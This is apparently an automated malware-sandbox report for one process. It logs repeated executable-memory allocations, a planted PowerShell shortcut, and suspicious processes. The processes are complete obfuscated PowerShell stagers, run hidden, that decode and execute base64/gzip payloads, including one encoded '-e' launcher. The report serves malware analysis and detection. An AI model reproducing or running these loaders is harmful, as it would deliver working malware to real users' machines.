NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02710000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02770000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02771000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02772000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02773000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02774000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02775000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02776000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02777000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02778000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02779000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0277a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0277b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0277c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0277d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0277e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0277f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a41000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a42000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a43000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 9:14 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a44000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAKsPb'+'WQCA7VW+2+jOBD+/aT9H9AqUkCbB{1}LY7UNa6UwoI'+'W2SJqV5b3RywQF{1}DE7BNE339n+/AUIf13bVO2ktpcX2zHj8zTczXiWhIygPpaRXk358+EPajwGOcCDJJbGrW6wilaLm3d2h8rhf8o/upa+S{1}ECbjcEDT{2}PlyUkriSISinxebROB4pgE14ySWFak{1}6WJTyJycHH9nThC+iGV/qq2Gb/GbC+2a2HHJ9IBCt10r8sdnLpWtTe{2}Crn87VtZWRzUltXTmwSzWC7bu1iQoOoyVlakn0p64NVuQ+R'+'yjzoRj/lKVCc0bNSrozDGK9IHa7ekR4TP3bg{2}'+'d3m8TUREEoXZpVIruYxchs9BxB'+'3kuhGJ43JFWqT2F8{1}ln/Jif/hlEgoakGonFCTiG5tEt9QhcdX'+'Coc{1}IJVktQcsWEQ29paKA2C1fE7kUJgxQ/S9m5D7ZFtC9V0l+qgRSAxEpFQjqy2{1}2uJswkiuWX/Ez54EC44ELAODPF{2}NVwSD++RUCPS4UY5HtEHBZH{1}CYZqpfJa0i9eB0LHi0g2npKkqIsnwAXCrxa25X3mutVqiCIrlhsLIYc+ouH/Wfhb8U'+'+PdDP5V6m80GWdGQGLsQB9QpCCu/FhWyYiRDpFqI9cFDubzfIK5BGPGwSIFOyfFC7TSg4kFXTyhzSYQciGw{2}XkHQlefO5LGTy52wRwKAL58DW0srSBNSSO9TY1ecns5BqNxiOI4r0iCBPHUqkk0wI25FQmF{2}91soETz7LD+620uYoA6ORWFuqfwbz/25LR7GIkociCxgcGV{1}iE{2}xSy'+'GpSBZ1ib6zqVecX34VkBZmDBIILN1CQGAlBcIWKV8icDXjhlK1iegEG0YCk{2}kKh8mwB2VinyYZwbBH3PJbnhb5kJ{2}/xaYA5YmfEHCbcV'+'GRxjQSUIdSnIFi/8uLlwUod6cVkX2A5CLLF{1}pOpIlQwqP5aTOl6h6'+'mDJRIACBmxA{2}dx+RL{2}6838kf1gg4QjJlh2ZS{2}17TW2cK{1}B78RbXS4ceien3231J7Tigdt8wjRrbd1j{1}rIcc9ccmyD3JBqnSPktrpDi5pb09WukDWkNc+jmjcbIe{1}Kd5g2{2}CzVnsUa3VqTnmPo99t6DIRtNq2phhqN5kVDWwOA{2}9BbI7cf0O1dF76hsF509U6sax12eta6{1}J7UzfmEWWrT9FcTHttfZoaqqscuNno7hHTuNnq'+'7ae2SX1lOoDdDrh63mmt0ilArPB2bOj+f6REaqGPsbfh2Oh2yttdC+ucmJfPhyNSHQ1NH'+'o/b3G+NY9dTjyRT7+mRcp/PN9NKHubm1hueq1uy45J7PtwBcmyPsXYK{2}16o7/gpkjE9I/9TncR2{1}dY50kDHnN6jtzzbmg{2}H+1ajO0Zj1pxh15ztTVWuzQRNZGp+0PTQEcezpQ4ziW+PeUGtjl7uTz/3ZSh1P'+'2aFqtIYDf5reWd0E6d+tZZw789rWuTg86k7oOOBopKrjj8CKxYiGolFflpLpdNVJK+iHP0pbr/2EGm/1hx6OYh8zoAxU/iJ/TR6Z+0o+4DTVkOX0TbAmUUg'+'YNFFoswXnEWPcSTsJ'+'lHzoYXlnSR{1}dqJ'+'P59NqXIj0IKo8Nplg6OZmDi5BEGb2rXRJ6wq9odw1Ng86g3WnNLF3ef7{2}W3+zk3FolbS4pNA/mWWYeLNKVJ{2}u/HS54QwioZG8B9hZ2cPAaqg7UwbwSpAjqnLOn+OXXe'+'uDC{2}/QAthrcfJG+HnKWgIkDciOVRNpcnzbrEj67H0S/lTr7mubDP/fX1H'+'lc+8Xuu+ikVTJ8Xqw+X3'+'jSDn7f9SeYChC0oS4zkj8YXkNhnytPApxFBjJhtR/pO/oiEQd9eJll{1}eEfWhfCPcILA'+'AA{0}')-f'=','v','M')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
cmdline	C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEASwBzAFAAYgAnACcAKwAnACcAVwBRAEMAQQA3AFYAVwArADIAKwBqAE8AQgBEACsALwBhAFQAOQBIADkAQQBxAFUAawBDAGIAQgB7ADEAfQBMAFkANwBVAE4AYQA2AFUAdwBvAEkAJwAnACsAJwAnAFcAMgBTAEoAcQBWADUAYgAzAFIAeQB3AFEARgB7ADEAfQBEAEUANwBCAE4ARQAzADMAOQBuACsALwBBAFUASQBmADEAMwBiAFYATwAyAGsAdABwAGMAWAAyAHoASABqADgAegBUAGMAegBYAGkAVwBoAEkAeQBnAFAAcABhAFIAWABrADMANQA4ACsARQBQAGEAagB3AEcATwBjAEMARABKAEoAYgBHAHIAVwA2AHcAaQBsAGEATABtADMAZAAyAGgAOAByAGgAZgA4AG8ALwB1AHAAYQArAFMAewAxAH0ARQBDAGIAagBjAEUARABUAHsAMgB9AFAAbAB5AFUAawByAGkAUwBJAFMAaQBuAHgAZQBiAFIATwBCADQAcABnAEUAMQA0AHkAUwBXAEYAYQBrAHsAMQB9ADYAVwBKAFQAeQBKAHkAYwBIAEgAOQBuAFQAaABDACsAaQBHAFYALwBxAHEAMgBHAGIALwBHAGIAQwArADIAYQAyAEgASABKADkASQBCAEMAdAAxADAAcgA4AHMAZABuAEwAcABXAHQAVABlAHsAMgB9AEMAcgBuADgANwBWAHQAWgBXAFIAegBVAGwAdABYAFQAbQB3AFMAegBXAEMANwBiAHUAMQBpAFEAbwBPAG8AeQBWAGwAYQBrAG4AMABwADYANABOAFYAdQBRACsAUgAnACcAKwAnACcAeQBqAHoAbwBSAGoALwBsAEsAVgBDAGMAMABiAE4AUwByAG8AegBEAEcASwA5AEkASABhADcAZQBrAFIANABUAFAAMwBiAGcAewAyAH0AJwAnACsAJwAnAGQAMwBtADgAVABVAFIARQBFAG8AWABaAHAAVgBJAHIAdQBZAHgAYwBoAHMAOQBCAHgAQgAnACcAKwAnACcAMwBrAHUAaABHAEoANAAzAEoARgBXAHEAVAAyAEYAOAB7ADEAfQBsAG4ALwBKAGkAZgAvAGgAbABFAGcAbwBhAGsARwBvAG4ARgBDAFQAaQBHADUAdABFAHQAOQBRAGgAYwBkAFgAJwAnACsAJwAnAEMAbwBjAHsAMQB9AEkASgBWAGsAdABRAGMAcwBXAEUAUQAyADkAcABhAEsAQQAyAEMAMQBmAEUANwBrAFUASgBnAHgAUQAvAFMAOQBtADUARAA3AFoARgB0AEMAOQBWADAAbAArAHEAZwBSAFMAQQB4AEUAcABGAFEAagBxAHkAMgB7ADEAfQAyAHUASgBzAHcAawBpAHUAVwBYAC8ARQB6ADUANABFAEMANAA0AEUATABBAE8ARABQAEYAewAyAH0ATgBWAHcAUwBEACsAKwBSAFUAQwBQAFMANABVAFkANQBIAHQARQBIAEIAWgBIAHsAMQB9AEMAWQBaAHEAcABmAEoAYQAwAGkAOQBlAEIAMABMAEgAaQAwAGcAMgBuAHAASwBrAHEASQBzAG4AdwBBAFgAQwByAHgAYQAyADUAWAAzAG0AdQB0AFYAcQBpAEMASQByAGwAaABzAEwASQBZAGMAKwBvAHUASAAvAFcAZgBoAGIAOABVACcAJwArACcAJwArAFAAZABEAFAANQBWADYAbQA4ADAARwBXAGQARwBRAEcATABzAFEAQgA5AFEAcABDAEMAdQAvAEYAaABXAHkAWQBpAFIARABwAEYAcQBJADkAYwBGAEQAdQBiAHoAZgBJAEsANQBCAEcAUABHAHcAUwBJAEYATwB5AGYARgBDADcAVABTAGcANABrAEYAWABUAHkAaAB6AFMAWQBRAGMAaQBHAHcAewAyAH0AWABrAEgAUQBsAGUAZgBPADUATABHAFQAeQA1ADIAdwBSAHcASwBBAEwANQA4AEQAVwAwAHMAcgBTAEIATgBTAFMATwA5AFQAWQAxAGUAYwBuAHMANQBCAHEATgB4AGkATwBJADQAcgAwAGkAQwBCAFAASABVAHEAawBrADAAdwBJADIANQBGAFEAbQBGAHsAMgB9ADkAMQBzAG8ARQBUAHoANwBMAEQAKwA2ADIAMAB1AFkAbwBBADYATwBSAFcARgB1AHEAZgB3AGIAegAvADIANQBMAFIANwBHAEkAawBvAGMAaQBDAHgAZwBjAEcAVgB7ADEAfQBpAEUAewAyAH0AeABTAHkAJwAnACsAJwAnAEcAcABTAEIAWgAxAGkAYgA2AHoAcQBWAGUAYwBYADMANABWAGsAQgBaAG0ARABCAEkASQBMAE4AMQBDAFEARwBBAGwAQgBjAEkAVwBLAFYAOABpAGMARABYAGoAaABsAEsAMQBpAGUAZwBFAEcAMABZAEMAawB7ADIAfQBrAEsAaAA4AG0AdwBCADIAVgBpAG4AeQBZAFoAdwBiAEIASAAzAFAASgBiAG4AaABiADUAawBKAHsAMgB9AC8AeABhAFkAQQA1AFkAbQBmAEUASABDAGIAYwBWACcAJwArACcAJwBHAFIAeABqAFEAUwBVAEkAZABTAG4ASQBGAGkALwA4AHUATABsAHcAVQBvAGQANgBjAFYAawBYADIAQQA1AEMATABMAEYAewAxAH0AcABPAHAASQBsAFEAdwBxAFAANQBhAFQATwBsADYAaAA2ACcAJwArACcAJwBtAEQASgBSAEkAQQBDAEIAbQB4AEEAewAyAH0AZAB4ACsAUgBMAHsAMgB9ADYAOAAzADgAawBmADEAZwBnADQAUQBqAEoAbABoADIAWgBTAHsAMgB9ADEANwBUAFcAMgBjAEsAewAxAH0AQgA3ADgAUgBiAFgAUwA0AGMAZQBpAGUAbgAzADIAMwAxAEoANwBUAGkAZwBkAHQAOAB3AGoAUgByAGIAZAAxAGoAewAxAH0AcgBJAGMAYwA5AGMAYwBtAHkARAAzAEoAQgBxAG4AUwBQAGsAdAByAHAARABpADUAcABiADAAOQBXAHUAawBEAFcAawBOAGMAKwBqAG0AagBjAGIASQBlAHsAMQB9AEsAZAA1AGcAMgB7ADIAfQBDAHoAVgBuAHMAVQBhADMAVgBxAFQAbgBtAFAAbwA5ADkAdAA2AEQASQBSAHQATgBxADIAcABoAGgAcQBOADUAawBWAEQAVwB3AE8AQQB7ADIAfQA5AEIAYgBJADcAYwBmADAATwAxAGQARgA3ADYAaABzAEYANQAwADkAVQA2AHMAYQB4ADEAMgBlAHQAYQA2AHsAMQB9AEoANwBVAHoAZgBtAEUAVwBXAHIAVAA5AEYAYwBUAEgAdAB0AGYAWgBvAGEAcQBxAHMAYwB1AE4AbgBvADcAaABIAFQAdQBOAG4AcQAnACcAKwAnACcANwBhAGUAMgBTAFgAMQBsAE8AbwBEAGQARAByAGgANgAzAG0AbQB0ADAAaQBsAEEAcgBQAEIAMgBiAE8AagArAGYANgBSAEUAYQBxAEcAUABzAGIAZgBoADIATwBoADIAeQB0AHQAZABDACsAdQBjAG0ASgBmAFAAaAB5AE4AUwBIAFEAMQBOAEgAJwAnACsAJwAnAG8ALwBiADMARwArAE4AWQA5AGQAVABqAHkAUgBUADcAKwBtAFIAYwBwAC8AUABOADkATgBLAEgAdQBiAG0AMQBoAHUAZQBxADEAdQB5ADQANQBKADcAUAB0AHcAQgBjAG0AeQBQAHMAWABZAEsAewAyAH0AMQA2AG8ANwAvAGcAcABrAGoARQA5AEkALwA5AFQAbgBjAFIAMgB7ADEAfQBkAFkANQAwAGsARABIAG4ATgA2AGoAdAB6AHoAYgBtAGcAewAyAH0ASAArADEAYQBqAE8AMABaAGoAMQBwAHgAaAAxADUAegB0AFQAVgBXAHUAegBRAFIATgBaAEcAcAArADAAUABUAFEARQBjAGUAegBwAFEANAB6AGkAVwArAFAAZQBVAEcAdABqAGwANwB1AFQAegAvADMAWgBTAGgAMQBQACcAJwArACcAJwAyAGEARgBxAHQASQBZAEQAZgA1AHIAZQBXAGQAMABFADYAZAArAHQAWgBaAHcANwA4ADkAcgBXAHUAVABnADgANgBrADcAbwBPAE8AQgBvAHAASwByAGoAagA4AEMASwB4AFkAaQBHAG8AbABGAGYAbABwAEwAcABkAE4AVgBKAEsAKwBpAEgAUAAwAHAAYgByAC8AMgBFAEcAbQAvADEAaAB4ADYATwBZAGgAOAB6AG8AQQB4AFUALwBpAEoALwBUAFIANgBaACsAMABvACsANABEAFQAVgBrAE8AWAAwAFQAYgBBAG0AVQBVAGcAJwAnACsAJwAnAFkATgBGAEYAbwBzAHcAWABuAEUAVwBQAGMAUwBUAHMASgAnACcAKwAnACcAbABIAHoAbwBZAFgAbABuAFMAUgB7ADEAfQBkAHEASgAnACcAKwAnACcAUAA1ADkATgBxAFgASQBqADAASQBLAG8AOABOAHAAbABnADYATwBaAG0ARABpADUAQgBFAEcAYgAyAHIAWABSAEoANgB3AHEAOQBvAGQAdwAxAE4AZwA4ADYAZwAzAFcAbgBOAEwARgAzAGUAZgA3AHsAMgB9AFcAMwArAHoAawAzAEYAbwBsAGIAUwA0AHAATgBBAC8AbQBXAFcAWQBlAEwATgBLAFYASgB7ADIAfQB1AC8ASABTADUANABRAHcAaQBvAFoARwA4AEIAOQBoAFoAMgBjAFAAQQBhAHEAZwA3AFUAdwBiAHcAUwBwAEEAagBxAG4ATABPAG4AKwBPAFgAWABlACcAJwArACcAJwB1AEQAQwB7ADIAfQAvAFEAQQB0AGgAcgBjAGYASgBHACsASABuAEsAVwBnAEkAawBEAGMAaQBPAFYAUgBOAHAAYwBuAHoAYgByAEUAagA2ADcASAAwAFMALwBsAFQAcgA3AG0AdQBiAEQAUAAvAGYAWAAxAEgAJwAnACsAJwAnAGwAYwArADgAWAB1AHUAKwBpAGsAVgBUAEoAOABYAHEAdwArAFgAMwAnACcAKwAnACcAagBTAEQAbgA3AGYAOQBTAGUAWQBDAGgAQwAwAG8AUwA0AHoAawBqADgAWQBYAGsATgBoAG4AeQB0AFAAQQBwAHgARgBCAGoASgBoAHQAUgAvAHAATwAvAG8AaQBFAFEAZAA5AGUASgBsAGwAewAxAH0AZQBFAGYAVwBoAGYAQwBQAGMASQBMAEEAJwAnACsAJwAnAEEAQQB7ADAAfQAnACcAKQAtAGYAJwAnAD0AJwAnACwAJwAnAHYAJwAnACwAJwAnAE0AJwAnACkAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBv